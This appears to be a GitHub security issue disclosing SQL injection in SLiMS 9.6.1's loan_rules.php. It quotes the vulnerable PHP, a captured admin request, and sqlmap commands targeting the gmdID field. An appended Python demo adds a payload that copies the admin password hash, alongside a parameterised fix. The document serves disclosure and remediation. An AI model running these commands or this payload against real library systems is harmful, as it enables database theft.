
[Security Bugs] SQL Injection at loan_rules.php #205

Closed
@komangsughosa

Description


The bug

A SQL injection exists in admin/modules/circulation/loan_rules.php in the code below:

/* RECORD OPERATION */
if (isset($_POST['saveData'])) {
    $data['member_type_id'] = $_POST['memberTypeID'];
    $data['coll_type_id'] = $_POST['collTypeID'];
    $data['gmd_id'] = $_POST['gmdID'];
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['reborrow_limit'] = trim($_POST['reborrowLimit']);
    $data['fine_each_day'] = trim($_POST['fineEachDay']);
    $data['grace_periode'] = trim($_POST['gracePeriode']);
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    // create sql op object
    $sql_op = new simbio_dbop($dbs);
    if (isset($_POST['updateRecordID'])) {
        /* UPDATE RECORD MODE */
        // remove input date
        unset($data['input_date']);
        // filter update record ID
        $updateRecordID = (integer)$_POST['updateRecordID'];
        // update the data
        $update = $sql_op->update('mst_loan_rules', $data, 'loan_rules_id='.$updateRecordID);
        if ($update) {
            toastr(__('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(parent.jQuery.ajaxHistory[0].url);</script>';
        } else { toastr(__('Loan Rules FAILED to Updated. Please Contact System Administrator')."\nDEBUG : ".$sql_op->error)->error(); }
        exit();
    } else {
        /* INSERT RECORD MODE */
        $insert = $sql_op->insert('mst_loan_rules', $data); // BUG HERE
        if ($insert) {
            toastr(__('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(\''.$_SERVER['PHP_SELF'].'\');</script>';
        } else { toastr(__('Loan Rules FAILED to Save. Please Contact System Administrator')."\n".$sql_op->error)->error(); }
        exit();
    }
    exit();
} 

To Reproduce

Steps to reproduce the behavior:

  1. Login as admin or a user that has access to circulation.

  2. Make sure Burp Suite is on to capture the request, such as the one below (screenshot slims-sqli0).

  3. Save the request into a file (example.req).

  4. Run the test with sqlmap with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql

  5. Voila (screenshot slims-sqli1).

example.req

POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
Host: localhost
Content-Length: 1195
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
Accept-Encoding: gzip, deflate
Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
Connection: close

------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="csrf_token"

98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="form_name"

mainForm
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="memberTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="collTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gmdID"

0
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanPeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="reborrowLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="fineEachDay"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gracePeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="saveData"

Save
------WebKitFormBoundarypqBOyIslkQAaoPCi--

Screenshots

Proof of concept: current database (screenshot slims-sqli2).

Command to run: sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql --current-db

Versions

  • Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86_64)
  • SLiMS version: slims9_bulian-9.6.1

Notes

Added a comment marking the bug. Last edit at 18 August 2023 21:12 GMT+7
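To show why the handler above is injectable and what the fix looks like, here is an added Python model of the bug; it is not the reporter's or the SLiMS project's code. It assumes that the database layer behind $sql_op->insert() quotes each value and concatenates it into the INSERT statement, which the sqlmap result is consistent with but the excerpt does not show. The schema, the admin row, the hash and the form values are constructed. The payload uses SQLite's || string concatenation because the example runs on an in-memory SQLite database; against MySQL the equivalent would use CONCAT(). The hardened insert does what the update branch already does for updateRecordID (an integer cast) for every numeric field, and binds all values as parameters.

```python
import sqlite3

# Constructed stand-in for the two tables involved; the real SLiMS schema
# is larger.  Not the project's own DDL.
SCHEMA = """
CREATE TABLE user (user_id INTEGER PRIMARY KEY, username TEXT, passwd TEXT);
CREATE TABLE mst_loan_rules (
    loan_rules_id INTEGER PRIMARY KEY AUTOINCREMENT,
    member_type_id TEXT, coll_type_id TEXT, gmd_id TEXT,
    loan_limit TEXT, loan_periode TEXT, reborrow_limit TEXT,
    fine_each_day TEXT, grace_periode TEXT, input_date TEXT, last_update TEXT
);
INSERT INTO user VALUES (1, 'admin', '$2y$10$constructedhash');
"""

COLUMNS = ["member_type_id", "coll_type_id", "gmd_id", "loan_limit",
           "loan_periode", "reborrow_limit", "fine_each_day",
           "grace_periode", "input_date", "last_update"]
DATE_COLUMNS = ("input_date", "last_update")


def form_data(gmd_id):
    """Mirror the $data array the handler builds from $_POST (constructed
    values, same field names as the captured request)."""
    return {"member_type_id": "1", "coll_type_id": "1", "gmd_id": gmd_id,
            "loan_limit": "1", "loan_periode": "1", "reborrow_limit": "1",
            "fine_each_day": "1", "grace_periode": "1",
            "input_date": "2023-08-18", "last_update": "2023-08-18"}


def vulnerable_insert(conn, data):
    """Assumed model of the bug: each value is wrapped in single quotes and
    concatenated into the statement, so a quote inside gmd_id closes the
    literal and whatever follows is parsed as SQL."""
    cols = ", ".join(COLUMNS)
    vals = ", ".join("'" + str(data[c]) + "'" for c in COLUMNS)
    sql = f"INSERT INTO mst_loan_rules ({cols}) VALUES ({vals})"
    conn.execute(sql)
    return sql


def safe_insert(conn, data):
    """Hardened form: ids and counters must parse as integers (raises
    ValueError otherwise), and every value is bound as a parameter so the
    database never sees user input as SQL text."""
    clean = {c: (data[c] if c in DATE_COLUMNS else int(data[c]))
             for c in COLUMNS}
    placeholders = ", ".join("?" for _ in COLUMNS)
    sql = (f"INSERT INTO mst_loan_rules ({', '.join(COLUMNS)}) "
           f"VALUES ({placeholders})")
    conn.execute(sql, [clean[c] for c in COLUMNS])
    return sql


def stored_gmd_ids(conn):
    """gmd_id of every loan rule, in insertion order."""
    rows = conn.execute(
        "SELECT gmd_id FROM mst_loan_rules ORDER BY loan_rules_id")
    return [r[0] for r in rows]


def demo():
    """Run the payload through both code paths; returns
    (value stored by the vulnerable path, whether the safe path rejected
    the payload, value stored by the safe path for a normal request)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # SQLite payload for the gmdID field: the quote ends the literal and the
    # subquery copies the admin password hash into the new row's gmd_id,
    # where the application will later display it.  MySQL: CONCAT().
    payload = "0'||(SELECT passwd FROM user WHERE user_id=1)||'"
    vulnerable_insert(conn, form_data(payload))
    leaked = stored_gmd_ids(conn)[-1]
    try:
        safe_insert(conn, form_data(payload))
        rejected = False
    except ValueError:
        rejected = True
    safe_insert(conn, form_data("0"))
    return leaked, rejected, stored_gmd_ids(conn)[-1]


if __name__ == "__main__":
    leaked, rejected, normal = demo()
    print("vulnerable path stored:", leaked)
    print("safe path rejected payload:", rejected)
    print("safe path stored for gmdID=0:", normal)
```

The integer cast alone would already close this particular injection, but parameter binding is the property to rely on: it keeps the fix from depending on every caller remembering to cast, which is exactly what the insert branch forgot while the update branch remembered for updateRecordID.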
